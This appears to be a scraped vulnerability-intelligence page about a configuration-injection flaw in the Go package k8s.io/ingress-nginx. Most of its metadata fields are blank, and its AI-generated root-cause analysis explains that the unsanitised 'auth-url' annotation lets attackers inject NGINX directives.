-
CVSS Score
-Basic Information
CVE ID
-
GHSA ID
-
EPSS Score
-
CWE
-
Published
-
Updated
-
KEV Status
-
Technology
-
Technical Details
Vulnerability Intelligence
Miggo AI
Miggo AIMiggo AI| Package Name | Ecosystem | Vulnerable Versions | First Patched Version |
|---|---|---|---|
| k8s.io/ingress-nginx | go | ||
| k8s.io/ingress-nginx | go |
GoGoMiggo AIRoot Cause AnalysisThe vulnerability stems from improper handling of the 'auth-url' annotation value. The first vulnerable function (authURLAnnotationHandler.Handle) is responsible for processing the annotation but fails to validate/sanitize the input. The second (template.Writer.Write) incorporates this untrusted input into the final NGINX configuration without escaping. Together, these allow attackers to inject arbitrary NGINX directives through the annotation. The confidence is high as the vulnerability description explicitly identifies the auth-url annotation as the injection vector, and these functions align with the CWE-15/CWE-20 patterns of configuration control and input validation failures.
Ongoing coverage of React2Shell